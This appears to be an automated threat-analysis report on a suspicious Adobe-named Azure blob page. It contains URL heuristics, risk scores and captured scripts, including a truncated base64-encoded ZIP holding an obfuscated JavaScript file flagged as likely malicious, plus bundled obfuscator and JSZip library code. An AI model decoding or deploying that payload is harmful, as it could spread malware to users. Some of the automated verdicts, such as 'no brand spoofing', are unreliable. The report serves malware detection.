Windows Analysis Report
https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://adobe.blob.core.windows.net

{
    "risk_score": 9,
    "reasoning": "The provided JavaScript snippet appears to be a highly suspicious and potentially malicious script. It exhibits several high-risk indicators, including dynamic code execution through base64-encoded content, potential data exfiltration, and obfuscated code. The combination of these behaviors suggests a high likelihood of malicious intent, warranting a high-risk score."
}

      const base64ZIP = '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

```json
{
    "risk_score": 3,
    "reasoning": "The script contains obfuscated code, which is a high-risk indicator. However, there are no other clear malicious behaviors such as data exfiltration or dynamic code execution. The obfuscation suggests an attempt to hide the script's functionality, but without further context or additional risky behaviors, the risk is capped at 3."
}

/*! For license information please see index.browser.js.LICENSE.txt */
!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.JavaScriptObfuscator=t():e.JavaScriptObfuscator=t()}(self,(()=>(()=>{var e={3913:(e,t,r)=>{!function(){"use strict";var e,n,i,a,o,s,c,u,l,d,p,f,m,h,g,y,b,S,v,C,A,_,E,N,I,T;function D(e){return Y.Statement.hasOwnProperty(e.type)}o=r(2993),s=r(649),e=o.Syntax,i={"??":(n={Sequence:0,Yield:1,Assignment:1,Conditional:2,ArrowFunction:2,NullishCoalescing:3,LogicalOR:3,LogicalAND:4,BitwiseOR:5,BitwiseXOR:6,BitwiseAND:7,Equality:8,Relational:9,BitwiseSHIFT:10,Additive:11,Multiplicative:12,Exponentiation:13,Await:14,Unary:14,Postfix:15,OptionalChaining:16,Call:17,New:18,TaggedTemplate:19,Member:20,Primary:21}).NullishCoalescing,"||":n.LogicalOR,"&&":n.LogicalAND,"|":n.BitwiseOR,"^":n.BitwiseXOR,"&":n.BitwiseAND,"==":n.Equality,"!=":n.Equality,"===":n.Equality,"!==":n.Equality,is:n.Equality,isnt:n.Equality,"<":n.Relational,">":n.Relational,"<=":n.Relational,">=":n.Relational,in:n.Relational,instanceof:n.Relational,"<<":n.BitwiseSHIFT,">>":n.BitwiseSHIFT,">>>":n.BitwiseSHIFT,"+":n.Additive,"-":n.Additive,"*":n.Multiplicative,"%":n.Multiplicative,"/":n.Multiplicative,"**":n.Exponentiation};var O=32,R=33;function M(e,t){var r="";for(t|=0;t>0;t>>>=1,e+=e)1&t&&(r+=e);return r}function F(e){var t=e.length;return t&&s.code.isLineTerminator(e.charCodeAt(t-1))}function x(e,t){var r;for(r in t)t.hasOwnProperty(r)&&(e[r]=t[r]);return e}function P(e,t){var r,n;function i(e){return"object"==typeof e&&e instanceof Object&&!(e instanceof RegExp)}for(r in t)t.hasOwnProperty(r)&&(i(n=t[r])?i(e[r])?P(e[r],n):e[r]=P({},n):e[r]=n);return e}function w(e,t){return 8232==(-2&e)?(t?"u":"\\u")+(8232===e?"2028":"2029"):10===e||13===e?(t?"":"\\")+(10===e?"n":"r"):String.fromCharCode(e)}function B(e,t){var r;return 8===e?"\\b":12===e?"\\f":9===e?"\\t":(r=e.toString(16).toUpperCase(),l||e>255?"\\u"+"0000".slice(r.length)+r:0!==e||s.code.isDecimalDigit(t)?11===e?"\\x0B":"\\x"+"00".slice(r.length)+r:"\\0")}function k(e){if(92===e)return"\\\\";if(10===e)return"\\n";if(13===e)return"\\r";if(8232===e)return"\\u2028";if(8233===e)return"\\u2029";throw new Error("Incorrectly classified character")}function $(e){var t,r,n,i="";for(t=0,r=e.length;t<r;++t)n=e[t],i+=Array.isArray(n)?$(n):n;return i}function L(e,t){if(!_)return Array.isArray(e)?$(e):e;if(null==t){if(e instanceof a)return e;t={}}return null==t.loc?new a(null,null,_,e,t.name||null):new a(t.loc.start.line,t.loc.start.column,!0===_?t.loc.source||null:_,e,t.name||null)}function j(){return g||" "}function G(e,t){var r,n,i,a;return 0===(r=L(e).toString()).length?[t]:0===(n=L(t).toString()).length?[e]:(i=r.charCodeAt(r.length-1),a=n.charCodeAt(0),(43===i||45===i)&&i===a||s.code.isIdentifierPartES5(i)&&s.code.isIdentifierPartES5(a)||47===i&&105===a?[e,j(),t]:s.code.isWhiteSpace(i)||s.code.isLineTerminator(i)||s.code.isWhiteSpace(a)||s.code.isLineTerminator(a)?[e,t]:[e,g,t])}function V(e){return[c,e]}function U(e){var t;t=c,e(c+=u),c=t}function H(e,t){if("Line"===e.type){if(F(e.value))return"//"+e.value;var r="//"+e.value;return N||(r+="\n"),r}return C.format.indent.adjustMultilineComment&&/[\n\r]/.test(e.value)?function(e,t){var r,n,i,a,o,u,l,d;for(r=e.split(/\r\n|[\r\n]/),u=Number.MAX_VALUE,n=1,i=r.length;n<i;++n){for(a=r[n],o=0;o<a.length&&s.code.isWhiteSpace(a.charCodeAt(o));)++o;u>o&&(u=o)}for(void 0!==t?(l=c,"*"===r[1][u]&&(t+=" "),c=t):(1&u&&--u,l=c),n=1,i=r.length;n<i;++n)d=L(V(r[n].slice(u))),r[n]=_?d.join(""):d;return c=l,r.join("\n")}("/*"+e.value+"*/",t):"/*"+e.value+"*/"}function W(t,r){var n,i,a,o,l,d,p,f,m,h,g,y;if(t.leadingComments&&t.leadingComments.length>0){if(o=r,N){for(r=[],f=(a=t.leadingComments[0]).extendedRange,m=a.range,(y=((g=E.substring(f[0],m[0])).match(/\n/g)||[]).length)>0?(r.push(M("\n",y)),r.push(V(H(a)))):(r.push(g),r.push(H(a))),h=m,n=1,i=t.leadingComments.l

```json
{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet is a library for handling zip files (JSZip). It does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects. The code is not obfuscated and does not interact with external domains. It primarily focuses on encoding, decoding, and compression functionalities, which are typical for a library of this nature. Therefore, it is considered low risk."
}

/*!

JSZip v3.10.1 - A JavaScript class for generating and reading zip files
<http://stuartk.com/jszip>

(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>
Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/main/LICENSE.markdown.

JSZip uses the library pako released under the MIT license :
https://github.com/nodeca/pako/blob/main/LICENSE
*/

!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZip=e()}}(function(){return function s(a,o,h){function u(r,e){if(!o[r]){if(!a[r]){var t="function"==typeof require&&require;if(!e&&t)return t(r,!0);if(l)return l(r,!0);var n=new Error("Cannot find module '"+r+"'");throw n.code="MODULE_NOT_FOUND",n}var i=o[r]={exports:{}};a[r][0].call(i.exports,function(e){var t=a[r][1][e];return u(t||e)},i,i.exports,s,a,o,h)}return o[r].exports}for(var l="function"==typeof require&&require,e=0;e<h.length;e++)u(h[e]);return u}({1:[function(e,t,r){"use strict";var d=e("./utils"),c=e("./support"),p="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";r.encode=function(e){for(var t,r,n,i,s,a,o,h=[],u=0,l=e.length,f=l,c="string"!==d.getTypeOf(e);u<e.length;)f=l-u,n=c?(t=e[u++],r=u<l?e[u++]:0,u<l?e[u++]:0):(t=e.charCodeAt(u++),r=u<l?e.charCodeAt(u++):0,u<l?e.charCodeAt(u++):0),i=t>>2,s=(3&t)<<4|r>>4,a=1<f?(15&r)<<2|n>>6:64,o=2<f?63&n:64,h.push(p.charAt(i)+p.charAt(s)+p.charAt(a)+p.charAt(o));return h.join("")},r.decode=function(e){var t,r,n,i,s,a,o=0,h=0,u="data:";if(e.substr(0,u.length)===u)throw new Error("Invalid base64 input, it looks like a data url.");var l,f=3*(e=e.replace(/[^A-Za-z0-9+/=]/g,"")).length/4;if(e.charAt(e.length-1)===p.charAt(64)&&f--,e.charAt(e.length-2)===p.charAt(64)&&f--,f%1!=0)throw new Error("Invalid base64 input, bad content length.");for(l=c.uint8array?new Uint8Array(0|f):new Array(0|f);o<e.length;)t=p.indexOf(e.charAt(o++))<<2|(i=p.indexOf(e.charAt(o++)))>>4,r=(15&i)<<4|(s=p.indexOf(e.charAt(o++)))>>2,n=(3&s)<<6|(a=p.indexOf(e.charAt(o++))),l[h++]=t,64!==s&&(l[h++]=r),64!==a&&(l[h++]=n);return l}},{"./support":30,"./utils":32}],2:[function(e,t,r){"use strict";var n=e("./external"),i=e("./stream/DataWorker"),s=e("./stream/Crc32Probe"),a=e("./stream/DataLengthProbe");function o(e,t,r,n,i){this.compressedSize=e,this.uncompressedSize=t,this.crc32=r,this.compression=n,this.compressedContent=i}o.prototype={getContentWorker:function(){var e=new i(n.Promise.resolve(this.compressedContent)).pipe(this.compression.uncompressWorker()).pipe(new a("data_length")),t=this;return e.on("end",function(){if(this.streamInfo.data_length!==t.uncompressedSize)throw new Error("Bug : uncompressed data size mismatch")}),e},getCompressedWorker:function(){return new i(n.Promise.resolve(this.compressedContent)).withStreamInfo("compressedSize",this.compressedSize).withStreamInfo("uncompressedSize",this.uncompressedSize).withStreamInfo("crc32",this.crc32).withStreamInfo("compression",this.compression)}},o.createWorkerFrom=function(e,t,r){return e.pipe(new s).pipe(new a("uncompressedSize")).pipe(t.compressWorker(r)).pipe(new a("compressedSize")).withStreamInfo("compression",t)},t.exports=o},{"./external":6,"./stream/Crc32Probe":25,"./stream/DataLengthProbe":26,"./stream/DataWorker":27}],3:[function(e,t,r){"use strict";var n=e("./stream/GenericWorker");r.STORE={magic:"\0\0",compressWorker:function(){return new n("STORE compression")},uncompressWorker:function(){return new n("STORE decompression")}},r.DEFLATE=e("./flate")},{"./flate":7,"./stream/GenericWorker":28}],4:[function(e,t,r){"use strict";var n=e("./utils");var o=function(){for(var e,t=[],r=0;r<256;r++){e=r;for(var n=0;n<8;n++)e=1&e?3988292384^e>>>1:e>>>1;t[r]=e}return t}();t.exports=function(e,t){return void 0!==e&&e.length?"string"!==n.getTypeOf(e)?function(e,t,r,n){var i=o,s=n+r;e^=-1;for(var a=n;a<s;a